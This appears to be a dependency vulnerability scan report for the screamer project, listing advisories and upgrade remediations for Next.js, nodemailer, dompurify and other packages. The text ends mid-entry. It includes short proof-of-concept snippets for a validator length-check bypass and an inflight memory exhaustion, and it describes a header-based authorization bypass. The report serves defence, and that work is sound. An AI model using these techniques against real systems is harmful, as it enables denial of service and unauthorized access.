Vulnerabilities

 43 via 43 paths

Dependencies

 292

Source

 GitHub

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Issue type
  • 43
  • 1
Severity
  • 1
  • 12
  • 24
  • 7
Status
  • 44
  • 0
  • 0

critical severity

Improper Authorization

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@14.2.25.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Improper Authorization due to the improper handling of the x-middleware-subrequest header. An attacker can bypass authorization checks by sending crafted requests containing this specific header.

Workaround

This can be mitigated by preventing external user requests which contain the x-middleware-subrequest header from reaching your Next.js application.

Remediation

Upgrade next to version 12.3.5, 13.5.9, 14.2.25, 15.2.3, 15.3.0-canary.12 or higher.

References

Improper Authorization vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.0.8.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the decoding reply functions of React Flight protocol. An attacker can cause server crashes, out-of-memory exceptions, or excessive CPU usage by sending specially crafted HTTP requests to Server Function endpoints.

Notes:

  • This issue is a result of an incomplete fix for CVE-2025-55184
  • If your app’s React code does not use a server, your app is not affected by these vulnerabilities.
  • If your app does not use a framework, bundler, or bundler plugin that supports React Server Components, your app is not affected by these vulnerabilities.

Remediation

Upgrade next to version 15.0.8, 15.1.12, 15.2.9, 15.3.9, 15.4.11, 15.5.10, 15.6.0-canary.61, 16.0.11, 16.1.5, 16.2.0-canary.9 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.15.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the createMap, createSet, and extractIterator functions in packages/react-server/src/ReactFlightReplyServer.js. An attacker can crash the server by supplying a model that contains cyclic reference and is consumed more than once during React Server Components decoding. The repeated consumption triggers an exception during reply processing, breaking rendering for requests that handle attacker-controlled Flight payloads.

Remediation

Upgrade next to version 15.5.15, 16.2.3 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.16.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via server function endpoints. An attacker can cause out-of-memory exceptions or induce excessive CPU usage by sending malicious FormData in an HTTP request.

Note: Only React apps that use React Server Components are vulnerable.

Remediation

Upgrade next to version 15.5.16, 16.2.5 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

Deserialization of Untrusted Data

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@14.2.34.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to unsafe deserialization of payloads from HTTP requests to Server Function endpoints. An attacker can cause the server process to enter an infinite loop and hang, preventing it from serving future HTTP requests by sending specially crafted payloads.

Notes:

Even if your app does not implement any React Server Function endpoints it may still be vulnerable if your app supports React Server Components.

If your app’s React code does not use a server, your app is not affected by these vulnerabilities. If your app does not use a framework, bundler, or bundler plugin that supports React Server Components, your app is not affected by these vulnerabilities.

For React Native users not using a monorepo or react-dom, your react version should be pinned in your package.json, and there are no additional steps needed.

If you are using React Native in a monorepo, you should update only the impacted packages if they are installed: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack. This is required to mitigate the security advisories, but you do not need to update react and react-dom so this will not cause the version mismatch error in React Native. See this issue for more information.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.

Remediation

Upgrade next to version 14.2.34, 15.0.6, 15.1.10, 15.2.7, 15.3.7, 15.4.9, 15.5.8, 16.0.9, 16.1.0-canary.19 or higher.

References

Deserialization of Untrusted Data vulnerability report

high severity

Incomplete Filtering of One or More Instances of Special Elements

  • Vulnerable module: validator
  • Introduced through: validator@13.12.0

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer validator@13.12.0
    Remediation: Upgrade to validator@13.15.22.

Overview

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function that does not take into account Unicode variation selectors (\uFE0F, \uFE0E) appearing in a sequence which lead to improper string length calculation. This can lead to an application using isLength for input validation accepting strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service.

PoC

Input;

const validator = require('validator');

console.log(`Is "test" (String.length: ${'test'.length}) length less than or equal to 3? ${validator.isLength('test', { max: 3 })}`);
console.log(`Is "test" (String.length: ${'test'.length}) length less than or equal to 4? ${validator.isLength('test', { max: 4 })}`);
console.log(`Is "test\uFE0F\uFE0F\uFE0F\uFE0F" (String.length: ${'test\uFE0F\uFE0F\uFE0F\uFE0F'.length}) length less than or equal to 4? ${validator.isLength('test\uFE0F\uFE0F\uFE0F', { max: 4 })}`);

Output:

Is "test" (String.length: 4) length less than or equal to 3? false
Is "test" (String.length: 4) length less than or equal to 4? true
Is "test️️️️" (String.length: 8) length less than or equal to 4? true

Remediation

Upgrade validator to version 13.15.22 or higher.

References

Incomplete Filtering of One or More Instances of Special Elements vulnerability report

high severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@14.2.32.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the resolve-routes. An attacker can access internal resources and potentially exfiltrate sensitive information by crafting requests containing user-controlled headers (e.g., Location) that are forwarded or interpreted without validation.

Note: This is only exploitable if custom middleware logic is implemented in a self-hosted deployment. The project maintainers recommend using the documented NextResponse.next({request}) to explicitly pass the request object.

Remediation

Upgrade next to version 14.2.32, 15.4.2-canary.43, 15.4.7 or higher.

References

Server-side Request Forgery (SSRF) vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.10.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the fetchExternalImage() function, which is used for image optimization and loads external images into memory without a maximum size limit. An attacker can exhaust system memory and disrupt service availability by requesting optimization of very large images from external domains.

Note:

This is only exploitable if remotePatterns is configured to allow image optimization from external domains and the attacker can serve or control a large image on an allowed domain.

Remediation

Upgrade next to version 15.5.10, 16.1.1-canary.15, 16.1.5 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.16.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the Image Optimization API when handling requests to the /_next/image endpoint that match the images.localPatterns configuration. An attacker can exhaust server memory and cause a denial of service by requesting large local assets, leading to out-of-memory conditions.

Note: This is only exploitable if the default image loader is used and the images.localPatterns configuration allows access to large local files.

Workaround

This vulnerability can be mitigated by disabling routing of large local assets through /_next/image, disabling image optimization for large or untrusted local files, blocking image optimization access to those assets at the edge, or setting images.localPatterns: [] in the configuration.

Remediation

Upgrade next to version 15.5.16, 16.2.5 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity
new

Incorrect Authorization

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.16.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Incorrect Authorization in the /_next/data/<buildId>/<page>.json route when i18n is configured and authorization is enforced via middleware or proxy. An attacker can gain unauthorized access to sensitive server-side-rendered JSON data for protected pages by making locale-less requests that bypass the intended authorization checks.

Workaround

This vulnerability can be mitigated by enforcing authorization within the page's server-side data path rather than relying solely on middleware.

Remediation

Upgrade next to version 15.5.16, 16.2.5 or higher.

References

Incorrect Authorization vulnerability report

high severity

Missing Authorization

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@14.2.15.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Missing Authorization when using pathname-based checks in middleware for authorization decisions. If i18n configuration is not configured, an attacker can get unintended access to pages one level under the application's root directory.

e.g. https://example.com/foo is accessible. https://example.com/ and https://example.com/foo/bar are not.

Note:

Only self-hosted applications are vulnerable. The vulnerability has been fixed by Vercel on the server side.

Remediation

Upgrade next to version 13.5.8, 14.2.15, 15.0.0-canary.177 or higher.

References

Missing Authorization vulnerability report

high severity

Uncontrolled Recursion

  • Vulnerable module: nodemailer
  • Introduced through: supertokens-node@20.1.2

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer supertokens-node@20.1.2 nodemailer@6.10.1
    Remediation: Upgrade to supertokens-node@24.0.2.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to Uncontrolled Recursion in the addressparser function. An attacker can cause the process to terminate immediately by sending an email address header containing deeply nested groups, separated by many :s.

Remediation

Upgrade nodemailer to version 7.0.11 or higher.

References

Uncontrolled Recursion vulnerability report

high severity
new

Server-side Request Forgery (SSRF)

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.16.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via crafted WebSocket upgrade requests. An attacker can access internal or external resources by sending specially crafted requests with absolute-url that cause the server to proxy connections to arbitrary destinations, potentially exposing sensitive internal services or cloud metadata endpoints.

Workaround

This vulnerability can be mitigated by not exposing the origin server directly to untrusted networks, blocking WebSocket upgrades at the reverse proxy or load balancer if not required, and restricting origin egress to internal networks and metadata services where possible.

Remediation

Upgrade next to version 15.5.16, 16.2.5 or higher.

References

Server-side Request Forgery (SSRF) vulnerability report

medium severity

Prototype Pollution

  • Vulnerable module: js-yaml
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 js-yaml@4.1.0
    Remediation: Upgrade to swagger-ui-react@5.30.3.

Overview

js-yaml is a human-friendly data serialization language.

Affected versions of this package are vulnerable to Prototype Pollution via the merge function. An attacker can alter object prototypes by supplying specially crafted YAML documents containing __proto__ properties. This can lead to unexpected behavior or security issues in applications that process untrusted YAML input.

Workaround

This vulnerability can be mitigated by running the server with node --disable-proto=delete or by using Deno, which has pollution protection enabled by default.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade js-yaml to version 3.14.2, 4.1.1 or higher.

References

Prototype Pollution vulnerability report

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@16.1.7.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the lack of an upper bound on the disk cache used by the image optimization. An attacker can exhaust disk storage by generating a large number of unique image optimization variants, leading to service disruption.

Workaround

This vulnerability can be mitigated by periodically cleaning the .next/cache/images directory or by reducing the number of possible image variants through configuration of images.localPatterns, images.remotePatterns, and images.qualities.

Remediation

Upgrade next to version 16.1.7, 16.2.0-canary.54 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@14.2.21.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the Server Actions process. An attacker can cause the server to hang by constructing requests that leave Server-Actions requests pending until the hosting provider terminates the function execution.

Note:

This is only exploitable if there are no protections against long-running Server Action invocations.

Remediation

Upgrade next to version 13.5.8, 14.2.21, 15.1.2 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity

CRLF Injection

  • Vulnerable module: nodemailer
  • Introduced through: supertokens-node@20.1.2

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer supertokens-node@20.1.2 nodemailer@6.10.1
    Remediation: Upgrade to supertokens-node@24.0.2.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to CRLF Injection via the name configuration configuration option. An attacker can inject arbitrary SMTP commands by supplying carriage return and line feed sequences, enabling unauthorized email sending, sender spoofing, and phishing attacks before authentication occurs.

Remediation

Upgrade nodemailer to version 8.0.5 or higher.

References

CRLF Injection vulnerability report

medium severity

Interpretation Conflict

  • Vulnerable module: nodemailer
  • Introduced through: supertokens-node@20.1.2

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer supertokens-node@20.1.2 nodemailer@6.10.1
    Remediation: Upgrade to supertokens-node@24.0.2.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to Interpretation Conflict due to improper handling of quoted local-parts containing @. An attacker can cause emails to be sent to unintended external recipients or bypass domain-based access controls by crafting specially formatted email addresses with quoted local-parts containing the @ character.

Remediation

Upgrade nodemailer to version 7.0.7 or higher.

References

Interpretation Conflict vulnerability report

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: cookie
  • Introduced through: supertokens-node@20.1.2

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer supertokens-node@20.1.2 cookie@0.4.0
    Remediation: Upgrade to supertokens-node@21.0.0.

Overview

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the cookie name, path, or domain, which can be used to set unexpected values to other cookie fields.

Workaround

Users who are not able to upgrade to the fixed version should avoid passing untrusted or arbitrary values for the cookie fields and ensure they are set by the application instead of user input.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade cookie to version 0.7.0 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity
new

Operator Precedence Logic Error

  • Vulnerable module: dompurify
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 dompurify@3.1.4
    Remediation: Upgrade to swagger-ui-react@5.32.1.

Overview

dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.

Affected versions of this package are vulnerable to Operator Precedence Logic Error in the form of short-circuit evaluation that gives precedence to ADD_TAGS over FORBID_TAGS in _sanitizeElements(). In an application where ADD_TAGS is used as a function (via EXTRA_ELEMENT_HANDLING.tagCheck) and FORBID_TAGS is in use, an attacker can cause forbidden tags to be allowed.

Remediation

Upgrade dompurify to version 3.4.0 or higher.

References

Operator Precedence Logic Error vulnerability report

medium severity
new

Acceptance of Extraneous Untrusted Data With Trusted Data

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.16.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Acceptance of Extraneous Untrusted Data With Trusted Data through the improper handling of the x-nextjs-data header in middleware or proxy redirect responses. An attacker can disrupt access to redirect paths by injecting this header in requests, causing the middleware to generate a redirect response lacking a standard Location header. If a CDN or reverse proxy caches this malformed response without varying on the injected header, subsequent users may receive unusable redirects, resulting in service disruption until the cache is cleared.

Workaround

This vulnerability can be mitigated by configuring the CDN or reverse proxy to vary its cache key on x-nextjs-data for affected responses.

Remediation

Upgrade next to version 15.5.16, 16.2.5 or higher.

References

Acceptance of Extraneous Untrusted Data With Trusted Data vulnerability report

medium severity

HTTP Request Smuggling

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.13.

Overview

next is a react framework.

Affected versions of this package are vulnerable to HTTP Request Smuggling during the rewrite of the proxy traffic to an external backend. An attacker can access unintended backend routes by sending crafted DELETE or OPTIONS requests with Transfer-Encoding: chunked headers. This is only exploitable if the application is not hosted on providers that handle rewrites at the CDN level.

Workaround

This vulnerability can be mitigated by blocking chunked DELETE/OPTIONS requests on rewritten routes at the edge/proxy, or by enforcing authentication and authorization on backend routes.

Remediation

Upgrade next to version 15.5.13, 16.1.7, 16.2.0-canary.102 or higher.

References

HTTP Request Smuggling vulnerability report

medium severity
new

Interpretation Conflict

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.16.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Interpretation Conflict via improper handling of shared cache entries for React Server Component responses. An attacker can cause unintended component payloads to be served to other users by manipulating shared cache behavior through crafted requests.

Workaround

This vulnerability can be mitigated by ensuring your CDN or reverse proxy keys on the relevant RSC request headers honor Vary, or by disabling shared caching for affected App Router and RSC responses.

Remediation

Upgrade next to version 15.5.16, 16.2.5 or higher.

References

Interpretation Conflict vulnerability report

medium severity

Race Condition

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@14.2.24.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Race Condition in the Pages Router. An attacker can cause the server to serve incorrect pageProps data instead of the expected HTML content by exploiting a race condition between two requests, one containing the ?__nextDataRequest=1 query parameter and another with the x-now-route-matches header.

Notes:

  1. This is only exploitable if the CDN provider caches a 200 OK response even in the absence of explicit cache-control headers, enabling a poisoned response to persist and be served to subsequent users;

  2. No backend access or privileged escalation is possible through this vulnerability;

  3. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on 200 OK status without explicit cache-control headers.

  4. This is a bypass of the fix for CVE-2024-46982

Workaround

This can be mitigated by stripping the x-now-route-matches header from all incoming requests at your CDN and setting cache-control: no-store for all responses under risk.

Remediation

Upgrade next to version 14.2.24, 15.1.6 or higher.

References

Race Condition vulnerability report

medium severity

Use of Cache Containing Sensitive Information

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@14.2.31.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Use of Cache Containing Sensitive Information in the image optimization process, when responses from API routes vary based on request headers such as Cookie or Authorization. An attacker can gain unauthorized access to sensitive image data by exploiting cache key confusion, causing responses intended for authenticated users to be served to unauthorized users.

Note: Exploitation requires a prior authorized request to populate the cache.

Remediation

Upgrade next to version 14.2.31, 15.4.2-canary.19, 15.4.5 or higher.

References

Use of Cache Containing Sensitive Information vulnerability report

medium severity
new

Use of Weak Hash

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.16.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Use of Weak Hash via collisions in the _rsc cache-busting process. An attacker can manipulate cache entries by crafting requests that cause shared caches to serve incorrect response variants to users. This is only exploitable if deployments rely on shared caches with insufficient response partitioning.

Workaround

This vulnerability can be mitigated by ensuring intermediary caches correctly honor Vary for RSC-related request headers, or by disabling shared caching for affected RSC responses until a patched release is deployed.

Remediation

Upgrade next to version 15.5.16, 16.2.5 or higher.

References

Use of Weak Hash vulnerability report

medium severity

Missing Release of Resource after Effective Lifetime

  • Vulnerable module: inflight
  • Introduced through: next-swagger-doc@0.4.0

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next-swagger-doc@0.4.0 swagger-jsdoc@6.2.8 glob@7.1.6 inflight@1.0.6

Overview

Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.

Exploiting this vulnerability results in crashing the node process or in the application crash.

Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.

To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.

PoC

const inflight = require('inflight');

function testInflight() {
  let i = 0;
  function scheduleNext() {
    let key = `key-${i++}`;
    const callback = () => {
    };
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }

    setImmediate(scheduleNext);
  }


  if (i % 100 === 0) {
    console.log(process.memoryUsage());
  }

  scheduleNext();
}

testInflight();

Remediation

There is no fixed version for inflight.

References

Missing Release of Resource after Effective Lifetime vulnerability report

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: dompurify
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 dompurify@3.1.4
    Remediation: Upgrade to swagger-ui-react@5.32.1.

Overview

dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when sanitized HTML is reinserted into a new parsing context using innerHTML and special wrappers such as script, xmp, iframe, noembed, noframes, or noscript. An attacker can execute arbitrary JavaScript code in the client by crafting input that closes the special parsing context early and injects malicious markup, which is then interpreted during the second parse.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade dompurify to version 3.3.2 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity

Permissive List of Allowed Inputs

